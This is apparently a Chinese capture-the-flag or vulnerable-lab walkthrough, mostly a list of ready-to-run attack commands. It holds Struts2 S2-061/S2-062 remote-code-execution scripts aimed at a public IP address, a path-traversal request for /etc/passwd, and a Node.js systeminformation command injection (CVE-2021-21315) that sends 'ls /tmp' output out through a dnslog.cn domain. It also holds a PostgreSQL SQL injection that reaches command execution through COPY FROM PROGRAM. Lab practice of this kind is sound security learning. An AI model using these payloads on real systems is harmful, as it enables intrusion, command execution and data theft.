赞
踩
关闭靶场
sudo docker-compose down
运行此靶场
sudo docker-compose up -d
查看启动环境
sudo docker ps
运行dockers容器
docker exec -it 64052abd288b /bin/bash
docker exec -it 731dbae0e0b5 /bin/bash
集成化工具扫描
可以命令执行
集成化工具利用
直接梭哈
梭哈
直接梭哈
python3 struts2-061-poc.py http://123.58.224.8:64423 "ls /tmp"
python2 S2-061-shell.py http://123.58.224.8:64423
python3 s2-062.py --url http://123.58.224.8:25807 --cmd whoami
靶场无回显
目录穿越
GET /static/../../../a/../../../../etc/passwd HTTP/1.1
Node.js库中的systeminformation软件包中存在一个命令注入漏洞(CVE-2021-21315
配合dnslog。Cn带外检测
/api/getServices?name[]=$(ping%20`ls%20/tmp`.5afckd.dnslog.cn)
单引号已注入成功,SQL 语句报错:
/admin/vuln/collection/?detail__a%27b=123
创建 cmd_exec:
/admin/vuln/collection/?detail__title%27)%3d%271%27%20or%201%3d1%20%3bcreate%20table%20cmd_exec(cmd_output%20text)--%20
调用 cmd_exec 执行命令:
/admin/vuln/collection/?detail__title%27)%3d%271%27%20or%201%3d1%20%3bcopy%20cmd_exec%20FROM%20PROGRAM%20%27ping 37p5oe.dmp4tj.dnslog.cn%27--%20
Copyright © 2003-2013 www.wpsshop.cn 版权所有,并保留所有权利。